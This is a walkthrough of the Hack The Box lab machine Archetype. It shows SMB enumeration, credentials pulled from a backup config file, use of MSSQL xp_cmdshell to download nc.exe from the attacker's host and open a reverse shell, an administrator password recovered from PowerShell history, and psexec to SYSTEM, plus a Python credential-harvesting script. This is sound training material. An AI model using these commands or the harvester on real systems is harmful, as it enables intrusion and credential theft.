

Hack The Box Starting Point, first machine: Archetype. If you are just beginning with CTFs, here is a little help.
Prerequisites: yes, it is a basic machine and we have just started, but it still helps to have some idea of
nmap, SMB, smbclient, psexec, git clone, mssqlclient.py (and basic T-SQL commands), Impacket, basic Windows commands, Python's built-in web server, and netcat.
First we connect to the VPN, get the IP of the machine, and run a quick scan for open ports only (that first pass is not shown here).
We then run the aggressive scan (-sV -sC -A -O) on just the ports detected in step 1 {135, 139, 445, 1433, 47001, 49668}; you can also start from here with -p- to scan all ports. Two caveats on the scan below: because only open ports were scanned, nmap warns that its OS fingerprint is unreliable, so ignore the XP/7/2012 guess and trust the smb-os-discovery result instead (Windows Server 2019, build 17763); and -T5 is fast but drops probes on a slow VPN link, so -T4 is the safer default.
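As an added example (not the post's own tooling), here is a small Python helper for the two-stage scan described above: it parses the greppable output (-oG) of a fast all-ports scan and builds the argument list for the targeted -sC -sV scan. The text in SAMPLE_GREPPABLE is constructed to look like nmap's -oG format for this box's ports; it is not real scan output, and the filtered port in it is there only to show that non-open states are dropped.

```python
"""Two-stage nmap workflow helper (added example, not from the original post).

Stage 1 scans all TCP ports quickly with greppable output (-oG); stage 2 runs
the slow version/script scan only against the ports found open.
"""
import re
import shlex

# Constructed sample of `nmap -p- --min-rate 1000 -oG -` output (not real scan
# output); the filtered 5985/tcp line is there to show it gets ignored.
SAMPLE_GREPPABLE = (
    "# Nmap 7.91 scan initiated as: nmap -p- --min-rate 1000 -oG - 10.10.10.27\n"
    "Host: 10.10.10.27 ()\tStatus: Up\n"
    "Host: 10.10.10.27 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, "
    "445/open/tcp//microsoft-ds///, 1433/open/tcp//ms-sql-s///, 5985/filtered/tcp//wsman///, "
    "47001/open/tcp//http///, 49668/open/tcp//msrpc///\tIgnored State: closed (65528)\n"
)

# One port entry in -oG form: port/state/proto//service/
PORT_RE = re.compile(r"(\d+)/(open|filtered|closed)/(tcp|udp)//([^/]*)/")


def open_ports(greppable: str, proto: str = "tcp") -> list[int]:
    """Return the sorted list of ports nmap reported as open in -oG output."""
    ports = set()
    for line in greppable.splitlines():
        if "Ports:" not in line:
            continue
        for port, state, p, _service in PORT_RE.findall(line):
            if state == "open" and p == proto:
                ports.add(int(port))
    return sorted(ports)


def stage2_command(target: str, ports: list[int], outprefix: str = "stage2") -> list[str]:
    """Build argv for the targeted -sC -sV scan; refuse to build an empty scan."""
    if not ports:
        raise ValueError("no open ports; nothing to scan in stage 2")
    return ["nmap", "-sC", "-sV", "-p", ",".join(map(str, ports)), "-oA", outprefix, target]


if __name__ == "__main__":
    found = open_ports(SAMPLE_GREPPABLE)
    print(shlex.join(stage2_command("10.10.10.27", found)))
```

In practice you would pipe the real stage-1 output into open_ports and run the printed command; keeping the port list as data also makes it easy to feed the same ports to other tools later.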
┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ sudo nmap -sV -sC -A -O -T5 -p135,139,445,47001,49668,1433 10.10.10.27 -oA Archtype -vv
[sudo] password for abhinav:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-15 20:14 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Initiating Ping Scan at 20:14
Scanning 10.10.10.27 [4 ports]
Completed Ping Scan at 20:14, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:14
Completed Parallel DNS resolution of 1 host. at 20:14, 0.33s elapsed
Initiating SYN Stealth Scan at 20:14
Scanning 10.10.10.27 [6 ports]
Discovered open port 139/tcp on 10.10.10.27
Discovered open port 445/tcp on 10.10.10.27
Discovered open port 135/tcp on 10.10.10.27
Discovered open port 49668/tcp on 10.10.10.27
Discovered open port 1433/tcp on 10.10.10.27
Discovered open port 47001/tcp on 10.10.10.27
Completed SYN Stealth Scan at 20:14, 0.42s elapsed (6 total ports)
Initiating Service scan at 20:14
Scanning 6 services on 10.10.10.27
Completed Service scan at 20:16, 62.65s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.27
Initiating Traceroute at 20:16
Completed Traceroute at 20:16, 0.02s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:16
Completed Parallel DNS resolution of 2 hosts. at 20:16, 0.34s elapsed
NSE: Script scanning 10.10.10.27.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 22.62s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 1.99s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
Nmap scan report for 10.10.10.27
Host is up, received reset ttl 128 (0.045s latency).
Scanned at 2021-06-15 20:14:56 IST for 92s

PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 128 Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open  ms-sql-s     syn-ack ttl 128 Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-06-15T14:42:50
| Not valid after:  2051-06-15T14:42:50
| MD5:   6121 7eba 5d98 d31d 8323 934b 0cea a2c4
| SHA-1: e43f 3457 4f9d e534 91bb 3017 97a1 8af5 f43b b6e3
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQLwZia/44joxNsCS0vYybZDANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjEwNjE1MTQ0MjUwWhgPMjA1MTA2MTUxNDQyNTBaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK4Xpva/
| JMRfp+GRia0FeoMgsbwfmemIzJxSn1TVO3nwBX6TeICwT7K7SAxZyNdRiJYSOcPu
| nyQP91EqfpMHyPiiCCqc7ibV7lmn9bXEGbvLo76NAjZyD0eqoSNWQpHI1gVKk+0I
| zwjomOHqKzzMhSEIQ6CCINO9aB51bVLMtuJ5y34IJ1odLf3a0RYYmVkD0t/Spu4a
| frO+njDWHmcc4zv7U40tGp5sm0rlLqELWpC9AqoUDacQ6ahASMyGu6tc3mD3bLkC
| A22aoA31GLihtCTw2U8q/bj0MoTWL8f94sUchoU5xeJGe/zMEYP1WLFivZjzp4Yv
| ttk98hNAJSmNlHUCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAbpGUgLzkrFOaXLux
| znX+D25t+cZK12nMKCipFvVIr9Qik3fAc9yoqlLTyx01TnbkiwHiMPNIbKS8n+MR
| fuafpSLqwGdNHT6M/H2pgTPxuUmXVnXEdNFRB3I6Jf67U3BRh3lNSFapK+EtiEme
| aPCJnMZQnZyxAmmLMAOq1k9mGlf+a/zoOmI+x77SE/exvlmy+duLBWhvrrYkmm4o
| kFtCHZrkMUxbXdMbi9Md9hsijy6ojE+UUml6c4Jm4O2VRBvyVS+19RpMp1fATBWb
| minyiz/WfZE0TQTJFhxmdPq6ku2eMLiBjVfiVqrVgATv/dEf0GqqOUJy7HFhyQpL
| uYsPKQ==
|_-----END CERTIFICATE-----
|_ssl-date: 2021-06-15T15:04:39+00:00; +18m12s from scanner time.
47001/tcp open  http         syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows XP|7|2012
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=6/15%OT=135%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=60C8BD44%P=x
OS:86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=103%TS=U)OPS(O1=M5B4%O2=M5B4%O3=
OS:M5B4%O4=M5B4%O5=M5B4%O6=M5B4)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=FAF0%W5=FAF0
OS:%W6=FAF0)ECN(R=Y%DF=N%TG=80%W=FAF0%O=M5B4%CC=N%Q=)T1(R=Y%DF=N%TG=80%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=N%TG=80%W=FAF0%S=O%A=S+%F=AS%O=M5B4%R
OS:D=0%Q=)T4(R=Y%DF=N%TG=80%W=7FFF%S=A%A=Z%F=R%O=%RD=0%Q=)T6(R=Y%DF=N%TG=80
OS:%W=7FFF%S=A%A=Z%F=R%O=%RD=0%Q=)U1(R=N)IE(R=Y%DFI=N%TG=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h42m12s, deviation: 3h07m52s, median: 18m11s
| ms-sql-info:
|   10.10.10.27:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 53066/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 49748/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 45578/udp): CLEAN (Timeout)
|   Check 4 (port 63282/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-06-15T08:04:20-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-06-15T15:04:17
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.46 ms 192.168.252.2
2   0.45 ms 10.10.10.27

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.84 seconds
           Raw packets sent: 54 (4.316KB) | Rcvd: 39 (2.108KB)

┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$
The scan shows SMB on 139/445 (guest access allowed, signing not required) and MS SQL on 1433. Let's enumerate the SMB shares first; pressing Enter at the password prompt gives an anonymous (null) session, which is enough to list them here.
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ smbclient -L \\10.10.10.27\
Enter WORKGROUP\abhinav's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backups         Disk
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available
Next we check which of these shares we can actually read. ADMIN$ and C$ need administrative credentials, but backups opens anonymously and contains a single file, prod.dtsConfig (an SSIS package configuration file). Use smbclient's get command to copy it to the local machine.
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ smbclient //10.10.10.27/backups
Enter WORKGROUP\abhinav's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 20 17:50:57 2020
  ..                                  D        0  Mon Jan 20 17:50:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 17:53:02 2020

                10328063 blocks of size 4096. 8259190 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> ^C
The contents of the file are below. The connection string in ConfiguredValue carries a username and password in clear text, which is exactly why backup copies of SSIS configuration files should never sit on an anonymously readable share.
<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
From the detailed nmap scan we know port 1433 is running MS SQL Server 2017, so let's connect with the username and password from the backup file. The User ID is a Windows account (ARCHETYPE\sql_svc), not a SQL login, which is why mssqlclient.py needs the -windows-auth flag; we connect by hostname (ArchType.HTB) here, which needs an /etc/hosts entry, and the IP works just as well.
I would also suggest cloning impacket from https://github.com/SecureAuthCorp/impacket and installing it properly with pip from the clone; the scripts run much better from the cloned examples folder than the copies Kali ships under /usr/share/doc.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py ARCHTYPE/sql_svc@ArchType.HTB -windows-auth
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
Now we need netcat on the target. We host nc.exe on our machine with Python's built-in web server and fetch it from the target with PowerShell. nc.exe can be taken from https://github.com/int0x33/nc.exe/blob/master/nc.exe. (The repeated GET lines below are retries of the download; the winpeas.bat request is from an enumeration attempt not used in this write-up.)
┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.27 - - [16/Jun/2021 00:40:31] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.27 - - [16/Jun/2021 00:44:44] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.27 - - [16/Jun/2021 00:45:39] "GET /winpeas.bat HTTP/1.1" 200 -
10.10.10.27 - - [16/Jun/2021 00:48:28] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.27 - - [16/Jun/2021 00:50:25] "GET /nc.exe HTTP/1.1" 200 -
On the SQL side, enable_xp_cmdshell is an mssqlclient.py helper that runs sp_configure for you. Turning xp_cmdshell on needs sysadmin rights, which sql_svc evidently has on this instance (the "changed from 1 to 1" messages just mean the option was already enabled from an earlier attempt). Then xp_cmdshell runs the PowerShell download; wget is an alias of Invoke-WebRequest.

SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell "powershell wget -UseBasicParsing http://10.10.16.59:8000/nc.exe -OutFile %temp%/nc.exe"
output
--------------------------------------------------------------------------------
NULL
Now we start a netcat listener on our machine on any free port (1234 here) and run nc.exe on the target so it connects back to us.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
and we execute nc.exe from the target, again through xp_cmdshell:
SQL> xp_cmdshell "%temp%/nc.exe -nv 10.10.16.59 1234 -e cmd.exe"
Back in the netcat window the connection has come in and we have a shell as sql_svc. Let's grab the user flag and look for the root flag.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.59] from (UNKNOWN) [10.10.10.27] 49676
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd %userprofile%
cd %userprofile%

C:\Users\sql_svc>cd desktop
cd desktop

C:\Users\sql_svc\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users\sql_svc\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  33,786,163,200 bytes free

C:\Users\sql_svc\Desktop>type user.txt
type user.txt
3e7b102e78218e935bf3f4951fec21a3

C:\Users\sql_svc\Desktop>cd ..
cd ..

C:\Users\sql_svc>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users\sql_svc

01/20/2020  06:01 AM    <DIR>          .
01/20/2020  06:01 AM    <DIR>          ..
01/20/2020  06:01 AM    <DIR>          3D Objects
01/20/2020  06:01 AM    <DIR>          Contacts
01/20/2020  06:42 AM    <DIR>          Desktop
01/20/2020  06:01 AM    <DIR>          Documents
01/20/2020  06:01 AM    <DIR>          Downloads
01/20/2020  06:01 AM    <DIR>          Favorites
01/20/2020  06:01 AM    <DIR>          Links
01/20/2020  06:01 AM    <DIR>          Music
01/20/2020  06:01 AM    <DIR>          Pictures
01/20/2020  06:01 AM    <DIR>          Saved Games
01/20/2020  06:01 AM    <DIR>          Searches
01/20/2020  06:01 AM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  33,834,094,592 bytes free

C:\Users\sql_svc>cd ..
cd ..

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users

01/19/2020  04:10 PM    <DIR>          .
01/19/2020  04:10 PM    <DIR>          ..
01/19/2020  11:39 PM    <DIR>          Administrator
01/19/2020  11:39 PM    <DIR>          Public
01/20/2020  06:01 AM    <DIR>          sql_svc
               0 File(s)              0 bytes
               5 Dir(s)  33,833,717,760 bytes free

C:\Users>cd Administrator
cd Administrator
Access is denied.

C:\Users>
We have the user flag, but not the root flag yet: the Administrator profile is not readable as sql_svc.
Let's dig further. Command history is a good place to look for reused credentials; PowerShell's PSReadline module records every interactive command in ConsoleHost_history.txt under %APPDATA%, so we check that file for the sql_svc user.
C:\Users\sql_svc\AppData\Local\Microsoft\Windows\PowerShell>cd %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dmin!!
exit
So the history gives us the Administrator account's password, MEGACORP_4dmin!!, typed in clear on a net use command line, which is exactly why it ended up recorded.
Next we turn to psexec.py, which lets you execute commands on a remote system once you authenticate as a local administrator.
Note: if the impacket modules are not properly installed, you might spend the rest of your day trying to fix the errors.
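Both finds on this box (the connection string in prod.dtsConfig above and the net use line in the PowerShell history) are the same class of problem: a secret written into a file that a low-privileged user can read. As an added example, not the post's own code, here is a Python credential finder that handles both formats, generalised a little beyond the two files on the page: it reads every ConfiguredValue in a .dtsConfig rather than one, accepts the UID/PWD spellings as well as User ID/Password, and ignores net use lines that prompt for the password with * or carry only switches. The two sample inputs are constructed to mirror the files shown on the page.

```python
"""Credential finder for SSIS .dtsConfig connection strings and
'net use' lines in a PowerShell (PSReadline) history.

Added example, not the post's own code.
"""
import re
import sys
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from pathlib import Path


@dataclass(frozen=True)
class Credential:
    source: str   # file the secret was found in
    user: str
    secret: str


# Constructed sample mirroring the prod.dtsConfig found on the backups share.
SAMPLE_DTSCONFIG = r"""<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

# Constructed sample of a ConsoleHost_history.txt; the second line uses "*"
# (prompt for the password), so there is nothing to harvest from it.
SAMPLE_HISTORY = r"""net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dmin!!
net use Z: \\fileserver\share /user:CORP\svc_backup *
exit
"""


def parse_connection_string(cs: str) -> dict[str, str]:
    """Split an OLE DB style 'Key=Value;Key=Value' string into a dict (keys lower-cased)."""
    kv = {}
    for part in cs.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            kv[key.strip().lower()] = value.strip()
    return kv


def creds_from_dtsconfig(xml_text: str, source: str = "prod.dtsConfig") -> list[Credential]:
    """Walk every <ConfiguredValue> and return the User ID / Password pairs embedded in it."""
    found = []
    for node in ET.fromstring(xml_text).iter("ConfiguredValue"):
        kv = parse_connection_string(node.text or "")
        user = kv.get("user id") or kv.get("uid")
        secret = kv.get("password") or kv.get("pwd")
        if user and secret:
            found.append(Credential(source, user, secret))
    return found


# net[.exe] use [X:] \\server\share /user:NAME [PASSWORD]   ("*" means prompt)
NET_USE_RE = re.compile(
    r"\bnet(?:\.exe)?\s+use\s+(?:[A-Za-z]:\s+)?(\\\\\S+)\s+/user:\s*(\S+)(?:\s+(\S+))?",
    re.IGNORECASE,
)


def creds_from_history(history: str, source: str = "ConsoleHost_history.txt") -> list[Credential]:
    """Return passwords typed in clear on 'net use' lines of a shell history."""
    found = []
    for line in history.splitlines():
        m = NET_USE_RE.search(line)
        if not m:
            continue
        _share, user, secret = m.groups()
        # Skip prompts ("*") and lines where the next token is another switch.
        if secret and secret != "*" and not secret.startswith("/"):
            found.append(Credential(source, user, secret))
    return found


def scan_file(path: Path) -> list[Credential]:
    """Dispatch on extension: .dtsConfig is XML, anything else is treated as a history file."""
    text = path.read_text(errors="replace")
    if path.suffix.lower() == ".dtsconfig":
        return creds_from_dtsconfig(text, str(path))
    return creds_from_history(text, str(path))


if __name__ == "__main__":
    if len(sys.argv) > 1:
        hits = [c for p in sys.argv[1:] for c in scan_file(Path(p))]
    else:
        hits = creds_from_dtsconfig(SAMPLE_DTSCONFIG) + creds_from_history(SAMPLE_HISTORY)
    for c in hits:
        print(f"{c.source}: user={c.user} secret={c.secret}")
```

Run it with no arguments to see both sample hits, or pass the files pulled from a target (the downloaded prod.dtsConfig and a copied ConsoleHost_history.txt). The same two parsers work on the defensive side, pointed at backup shares and user profiles, to find this kind of exposure before someone else does.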
┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype/impacket/examples]
└─$ psexec.py Administrator@10.10.10.27 cmd
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file GCtlWvSE.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service JBxd on 10.10.10.27.....
[*] Starting service JBxd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd c:/users/administrator

c:\Users\Administrator>cd desktop

c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of c:\Users\Administrator\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:36 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  33,832,914,944 bytes free

c:\Users\Administrator\Desktop>type root.txt
b91ccec3305e98240082d4474b848528

c:\Users\Administrator\Desktop>
So now we have SYSTEM (root/admin) access and can read the root flag. Note what psexec.py did to get there, because it is also what a defender sees: it wrote a randomly named executable into the ADMIN$ share and created and started a service to run it, which is far noisier than the SQL path we used for the first shell.
I would not say the box was very simple to get around: the Python modules we used were broken, and without knowing how and what to use as a starting point on this machine it is not obvious, especially if you are not an experienced CTF player.